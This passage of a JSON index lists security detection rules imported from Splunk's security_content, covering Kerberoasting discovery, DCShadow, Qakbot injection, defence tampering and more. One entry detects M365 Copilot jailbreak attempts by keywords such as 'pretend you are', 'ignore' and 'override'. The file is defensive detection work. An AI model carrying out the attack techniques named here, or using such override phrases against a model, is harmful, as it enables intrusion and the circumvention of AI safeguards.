"https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_fullaccessasapp_permission_assigned.yml" } }, { "id": "splunk-security-content-ae874ad8-e353-40a7-87d4-420cdfb27d1a", "type": "detection", "name": "Zscaler Malware Activity Threat Blocked", "description": "The following analytic identifies potential malware activities within a network that are blocked by Zscaler. It leverages web proxy logs to filter for blocked actions associated with malware, aggregating occurrences by user, URL, and threat category. This detection is significant for SOC as it highlights attempts to access malicious content, indicating potential compromise or targeted attacks. If confirmed malicious, this activity could signify an ongoing attempt to infiltrate the network, necessitating immediate investigation to prevent further threats and ensure network integrity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/zscaler-malware-activity-threat-blocked.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ae874ad8-e353-40a7-87d4-420cdfb27d1a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/zscaler_malware_activity_threat_blocked.yml" } }, { "id": "splunk-security-content-ae8b3efc-2d2e-11ec-8b57-acde48001122", "type": "detection", "name": "ServicePrincipalNames Discovery with SetSPN", "description": "The following analytic detects the use of `setspn.exe` to query the domain for Service Principal Names (SPNs). This detection leverages Endpoint Detection and Response (EDR) data, focusing on specific command-line arguments associated with `setspn.exe`. Monitoring this activity is crucial as it often precedes Kerberoasting or Silver Ticket attacks, which can lead to credential theft. If confirmed malicious, an attacker could use the gathered SPNs to escalate privileges or persist within the environment, posing a significant security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1558.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/serviceprincipalnames-discovery-with-setspn.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ae8b3efc-2d2e-11ec-8b57-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/serviceprincipalnames_discovery_with_setspn.yml" } }, { "id": "splunk-security-content-ae915743-1aa8-4a94-975c-8062ebc8b723", "type": "detection", "name": "Windows AD DCShadow Privileges ACL Addition", "description": "This detection identifies an Active Directory access-control list (ACL) modification event, which applies the minimum required extended rights to perform the DCShadow attack.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1484", "T1207", "T1222.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-dcshadow-privileges-acl-addition.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ae915743-1aa8-4a94-975c-8062ebc8b723", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_dcshadow_privileges_acl_addition.yml" } }, { "id": "splunk-security-content-ae9b0df5-5fb0-477f-abc9-47faf42aa91d", "type": "detection", "name": "Windows Unusual NTLM Authentication Destinations By Source", "description": "The following analytic detects when an unusual number NTLM authentications is attempted by the same source against multiple destinations. This activity generally results when an attacker attempts to brute force, password spray, or otherwise authenticate to a multiple domain joined Windows devices using an NTLM based process/attack. This same activity may also generate a large number of EventID 4776 events as well.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-unusual-ntlm-authentication-destinations-by-source.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ae9b0df5-5fb0-477f-abc9-47faf42aa91d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_unusual_ntlm_authentication_destinations_by_source.yml" } }, { "id": "splunk-security-content-aec157f4-8783-4584-aca6-754c4dc7fba9", "type": "detection", "name": "Windows List ENV Variables Via SET Command From Uncommon Parent", "description": "The following analytic identifies a suspicious process command line fetching environment variables using the cmd.exe \"set\" command, with a non-shell parent process. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions and parent process names. This activity could be significant as it is commonly associated with malware like Qakbot, which uses this technique to gather system information. If confirmed malicious, this behavior could indicate that the parent process has been compromised, potentially allowing attackers to execute arbitrary commands, escalate privileges, or persist within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-list-env-variables-via-set-command-from-uncommon-parent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "aec157f4-8783-4584-aca6-754c4dc7fba9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_list_env_variables_via_set_command_from_uncommon_parent.yml" } }, { "id": "splunk-security-content-aec755a5-3a2c-4be0-ab34-6540e68644e9", "type": "detection", "name": "Windows Process Injection Of Wermgr to Known Browser", "description": "The following analytic identifies the suspicious remote thread execution of the wermgr.exe process into known browsers such as firefox.exe, chrome.exe, and others. It leverages Sysmon EventCode 8 logs to detect this behavior by monitoring SourceImage and TargetImage fields. This activity is significant because it is indicative of Qakbot malware, which injects malicious code into legitimate processes to steal information. If confirmed malicious, this activity could allow attackers to execute arbitrary code, escalate privileges, and exfiltrate sensitive data from the compromised host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-process-injection-of-wermgr-to-known-browser.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "aec755a5-3a2c-4be0-ab34-6540e68644e9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_process_injection_of_wermgr_to_known_browser.yml" } }, { "id": "splunk-security-content-aecaddaa-5885-4e44-a724-1edd5ecbc79f", "type": "detection", "name": "Windows Wmic Memory Chip Discovery", "description": "The following analytic detects the execution of Windows Management Instrumentation Command-line (WMIC) commands related to memory chip discovery on a Windows system. Specifically, it monitors instances where commands such as \u201cwmic memorychip\u201d are used to retrieve detailed information about installed RAM modules. While these commands can serve legitimate administrative and troubleshooting purposes, they may also be employed by adversaries to gather system hardware specifications as part of their reconnaissance activities. By identifying and alerting on WMIC memory chip queries, security teams can enhance their ability to spot unauthorized information gathering and take proactive measures to mitigate potential threats.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-wmic-memory-chip-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "aecaddaa-5885-4e44-a724-1edd5ecbc79f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_wmic_memory_chip_discovery.yml" } }, { "id": "splunk-security-content-aee4a575-7064-4e60-b511-246f9baf9895", "type": "detection", "name": "AWS Password Policy Changes", "description": "The following analytic detects successful API calls to view, update, or delete the password policy in an AWS organization. It leverages AWS CloudTrail logs to identify events such as \"UpdateAccountPasswordPolicy,\" \"GetAccountPasswordPolicy,\" and \"DeleteAccountPasswordPolicy.\" This activity is significant because it is uncommon for regular users to perform these actions, and such changes can indicate an adversary attempting to understand or weaken password defenses. If confirmed malicious, this could lead to compromised accounts and increased attack surface, potentially allowing unauthorized access and control over AWS resources.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1201" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-password-policy-changes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "aee4a575-7064-4e60-b511-246f9baf9895", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_password_policy_changes.yml" } }, { "id": "splunk-security-content-aeff2bb5-3483-48d4-9be8-c8976194be1e", "type": "detection", "name": "Cisco Secure Firewall - Repeated Malware Downloads", "description": "The following analytic detects repeated malware file downloads initiated by the same internal host (src) within a short time window. It leverages Cisco Secure Firewall Threat Defense logs and identifies `FileEvent` events with a `SHA_Disposition` of \"Malware\" and `FileDirection` set to \"Download\". If ten or more such events occur from the same host within five minutes, this analytic will trigger. This activity may indicate the host is compromised and repeatedly retrieving malicious content either due to command-and-control, malware staging, or automation. If confirmed malicious, this behavior may represent an infection in progress, persistence mechanism, or a malicious downloader.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105", "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-repeated-malware-downloads.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "aeff2bb5-3483-48d4-9be8-c8976194be1e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___repeated_malware_downloads.yml" } }, { "id": "splunk-security-content-af01f6db-26ac-440e-8d89-2793e303f137", "type": "detection", "name": "Windows DLL Side-Loading In Calc", "description": "The following analytic detects the loading of the \"WindowsCodecs.dll\" by calc.exe from a non-standard location This could be indicative of a potential DLL side-loading technique. This detection leverages Sysmon EventCode 7 to identify the DLL side-loading activity. In previous versions of the \"calc.exe\" binary, namely on Windows 7, it was vulnerable to DLL side-loading, where an attacker is able to load an arbitrary DLL named \"WindowsCodecs.dll\". This technique has been observed in Qakbot malware. This activity is significant as it indicates potential malware execution through a trusted process, which can bypass security controls. If confirmed malicious, this could allow attackers to execute arbitrary code, maintain persistence, and escalate privileges within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-dll-side-loading-in-calc.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "af01f6db-26ac-440e-8d89-2793e303f137", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_dll_side_loading_in_calc.yml" } }, { "id": "splunk-security-content-afed020e-edcd-4913-a675-cebedf81d4fb", "type": "detection", "name": "GitHub Enterprise Disable IP Allow List", "description": "The following analytic identifies when an IP allow list is disabled in GitHub Enterprise. The detection monitors GitHub Enterprise audit logs for actions related to disabling IP allow lists at the organization or enterprise level. This behavior is concerning because IP allow lists are a critical security control that restricts access to GitHub Enterprise resources to only trusted IP addresses. When disabled, it could indicate an attacker attempting to bypass access controls to gain unauthorized access from untrusted networks. The impact includes potential exposure of sensitive code repositories and GitHub Enterprise resources to access from any IP address. SOC teams should investigate such events, especially if they were not pre-approved changes, as they may indicate compromise of admin credentials or malicious insider activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001", "T1195" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/github-enterprise-disable-ip-allow-list.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "afed020e-edcd-4913-a675-cebedf81d4fb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/github_enterprise_disable_ip_allow_list.yml" } }, { "id": "splunk-security-content-afed80b2-d34b-11eb-a952-acde48001122", "type": "detection", "name": "Powershell Enable SMB1Protocol Feature", "description": "The following analytic detects the enabling of the SMB1 protocol via `powershell.exe`. It leverages PowerShell script block logging (EventCode 4104) to identify the execution of the `Enable-WindowsOptionalFeature` cmdlet with the `SMB1Protocol` parameter. This activity is significant because enabling SMB1 can facilitate lateral movement and file encryption by ransomware, such as RedDot. If confirmed malicious, this action could allow an attacker to propagate through the network, encrypt files, and potentially disrupt business operations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-enable-smb1protocol-feature.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "afed80b2-d34b-11eb-a952-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_enable_smb1protocol_feature.yml" } }, { "id": "splunk-security-content-b0359e05-c87b-4354-83d8-aee0d890243f", "type": "detection", "name": "Windows User Disabled Via Net", "description": "The following analytic detects the use of the `net.exe` utility to disable a user account via the command line. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs and command-line arguments. This activity is significant as it may indicate an adversary's attempt to disrupt user availability, potentially as a precursor to further malicious actions. If confirmed malicious, this could lead to denial of service for legitimate users, aiding the attacker in maintaining control or covering their tracks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1531" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-user-disabled-via-net.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b0359e05-c87b-4354-83d8-aee0d890243f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_user_disabled_via_net.yml" } }, { "id": "splunk-security-content-b04be6e5-2002-4349-8742-52285635b8f5", "type": "detection", "name": "Ivanti VTM New Account Creation", "description": "This analytic detects potential exploitation of the Ivanti Virtual Traffic Manager (vTM) authentication bypass vulnerability (CVE-2024-7593) to create new administrator accounts. The vulnerability allows unauthenticated remote attackers to bypass authentication on the admin panel and create new admin users. This detection looks for suspicious new account creation events in the Ivanti vTM audit logs that lack expected authentication details, which may indicate exploitation attempts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/ivanti-vtm-new-account-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b04be6e5-2002-4349-8742-52285635b8f5", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/ivanti_vtm_new_account_creation.yml" } }, { "id": "splunk-security-content-b05a4f25-e07d-436f-ab03-f954afa922c0", "type": "detection", "name": "M365 Copilot Jailbreak Attempts", "description": "Detects M365 Copilot jailbreak attempts through prompt injection techniques including rule manipulation, system bypass commands, and AI impersonation requests that attempt to circumvent built-in safety controls. The detection searches exported eDiscovery prompt logs for jailbreak keywords like \"pretend you are,\" \"act as,\" \"rules=,\" \"ignore,\" \"bypass,\" and \"override\" in the Subject_Title field, assigning severity scores based on the manipulation type (score of 4 for amoral impersonation or explicit rule injection, score of 3 for entity roleplay or bypass commands). Prompts with a jailbreak score of 2 or higher are flagged, prioritizing the most severe attempts to override AI safety mechanisms through direct instruction injection or unauthorized persona adoption.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/m365-copilot-jailbreak-attempts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b05a4f25-e07d-436f-ab03-f954afa922c0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/m365_copilot_jailbreak_attempts.yml" } }, { "id": "splunk-security-content-b061dfcc-f0aa-42cc-a6d4-a87f172acb79", "type": "detection", "name": "Windows Impair Defenses Disable HVCI", "description": "The following analytic detects the disabling of Hypervisor-protected Code Integrity (HVCI) by monitoring changes in the Windows registry. It leverages data from the Endpoint datamodel, specifically focusing on registry paths and values related to HVCI settings. This activity is significant because HVCI helps protect the kernel and system processes from tampering by malicious code. If confirmed malicious, disabling HVCI could allow attackers to execute unsigned kernel-mode code, potentially leading to kernel-level rootkits or other severe security breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defenses-disable-hvci.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b061dfcc-f0aa-42cc-a6d4-a87f172acb79", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defenses_disable_hvci.yml" } }, { "id": "splunk-security-content-b06a555e-dce0-417d-a2eb-28a5d8d66ef7", "type": "detection", "name": "Execution of File with Multiple Extensions", "description": "The following analytic detects the execution of files with multiple extensions, such as \".doc.exe\" or \".pdf.exe\". This behavior is identified using Endpoint Detection and Response (EDR) telemetry, focusing on process creation events where the file name contains double extensions. This activity is significant because attackers often use double extensions to disguise malicious executables as benign documents, increasing the likelihood of user execution. If confirmed malicious, this technique can lead to unauthorized code execution, potentially compromising the endpoint and allowing further malicious activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/execution-of-file-with-multiple-extensions.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b06a555e-dce0-417d-a2eb-28a5d8d66ef7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/execution_of_file_with_multiple_extensions.yml" } }, { "id": "splunk-security-content-b08e69d4-b42d-494c-bd30-abaaa3571ba4", "type": "detection", "name": "Cisco Secure Firewall - Bits Network Activity", "description": "The following analytic detects the use of the Background Intelligent Transfer Service (BITS) client application in allowed outbound connections. It leverages logs from Cisco Secure Firewall Threat Defense devices and identifies instances where BITS is used to initiate downloads from non-standard or unexpected domains. While BITS is a legitimate Windows service used for downloading updates, it is also commonly abused by adversaries to stealthily retrieve payloads or tools. This analytic filters out known Microsoft Edge update URLs and focuses on connections that may indicate suspicious or unauthorized file transfers. If confirmed malicious, this could represent a command and control (C2) channel or a download of malware or tooling as part of an attack chain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-bits-network-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b08e69d4-b42d-494c-bd30-abaaa3571ba4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___bits_network_activity.yml" } }, { "id": "splunk-security-content-b0a078e4-2601-11ec-9aec-acde48001122", "type": "detection", "name": "Process Writing DynamicWrapperX", "description": "The following analytic detects a process writing the dynwrapx.dll file to disk and registering it in the registry. It leverages data from the Endpoint datamodel, specifically monitoring process and filesystem events. This activity is significant because DynamicWrapperX is an ActiveX component often used in scripts to call Windows API functions, and its presence in non-standard locations is highly suspicious. If confirmed malicious, this could allow an attacker to execute arbitrary code, escalate privileges, or maintain persistence within the environment. Immediate investigation of parallel processes and registry modifications is recommended.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059", "T1559.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/process-writing-dynamicwrapperx.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b0a078e4-2601-11ec-9aec-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/process_writing_dynamicwrapperx.yml" } }, { "id": "splunk-security-content-b0b34e2c-90de-11ec-baeb-acde48001122", "type": "detection", "name": "Disabled Kerberos Pre-Authentication Discovery With PowerView", "description": "The following analytic detects the execution of the `Get-DomainUser` commandlet with the `-PreauthNotRequired` parameter using PowerShell Script Block Logging (EventCode=4104). This command is part of PowerView, a tool used for enumerating Windows Active Directory networks. Identifying domain accounts with Kerberos Pre-Authentication disabled is significant because adversaries can leverage this information to attempt offline password cracking. If confirmed malicious, this activity could lead to unauthorized access to domain accounts, potentially compromising sensitive information and escalating privileges within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1558.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disabled-kerberos-pre-authentication-discovery-with-powerview.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b0b34e2c-90de-11ec-baeb-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disabled_kerberos_pre_authentication_discovery_with_powerview.yml" } }, { "id": "splunk-security-content-b0b6fd2c-8953-4d1b-8f7b-56075ea6ab3e", "type": "detection", "name": "Windows User Deletion Via Net", "description": "The following analytic detects the use of net.exe or net1.exe command-line to delete a user account on a system. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and command-line execution logs. This activity is significant as it may indicate an attempt to impair user accounts or cover tracks during lateral movement. If confirmed malicious, this could lead to unauthorized access removal, disruption of legitimate user activities, or concealment of adversarial actions, complicating incident response and forensic investigations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1531" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-user-deletion-via-net.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b0b6fd2c-8953-4d1b-8f7b-56075ea6ab3e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_user_deletion_via_net.yml" } }, { "id": "splunk-security-content-b0c21379-f4ba-4bac-a958-897e260f964a", "type": "detection", "name": "Zscaler Potentially Abused File Download", "description": "The following analytic identifies the download of potentially malicious file types, such as .scr, .dll, .bat, and .lnk, within a network. It leverages web proxy logs from Zscaler, focusing on blocked actions and analyzing fields like deviceowner, user, urlcategory, url, dest, and filename. This activity is significant as these file types are often used to spread malware, posing a threat to network security. If confirmed malicious, this activity could lead to malware execution, data compromise, or further network infiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/zscaler-potentially-abused-file-download.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b0c21379-f4ba-4bac-a958-897e260f964a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/zscaler_potentially_abused_file_download.yml" } }, { "id": "splunk-security-content-b0c64d6e-cfdf-441a-b6ce-d956e202563e", "type": "detection", "name": "ESXi User Granted Admin Role", "description": "This detection identifies when a user is granted the Administrator role on an ESXi host. Assigning elevated privileges is a critical action that can indicate potential malicious behavior if performed unexpectedly. Adversaries who gain access may use this to escalate privileges, maintain persistence, or disable security controls.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098", "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/esxi-user-granted-admin-role.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b0c64d6e-cfdf-441a-b6ce-d956e202563e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/esxi_user_granted_admin_role.yml" } }, { "id": "splunk-security-content-b0cc6fa8-39b1-49ac-a4fe-f2f2a668e06c", "type": "detection", "name": "O365 SharePoint Allowed Domains Policy Changed", "description": "The following analytic identifies when the allowed domain settings for O365 SharePoint have been changed. With Azure AD B2B collaboration, users and administrators can invite external users to collaborate with internal users. External guest account invitations may also need access to OneDrive/SharePoint resources. These changed should be monitored by security teams as they could potentially lead to unauthorized access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-sharepoint-allowed-domains-policy-changed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b0cc6fa8-39b1-49ac-a4fe-f2f2a668e06c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_sharepoint_allowed_domains_policy_changed.yml" } }, { "id": 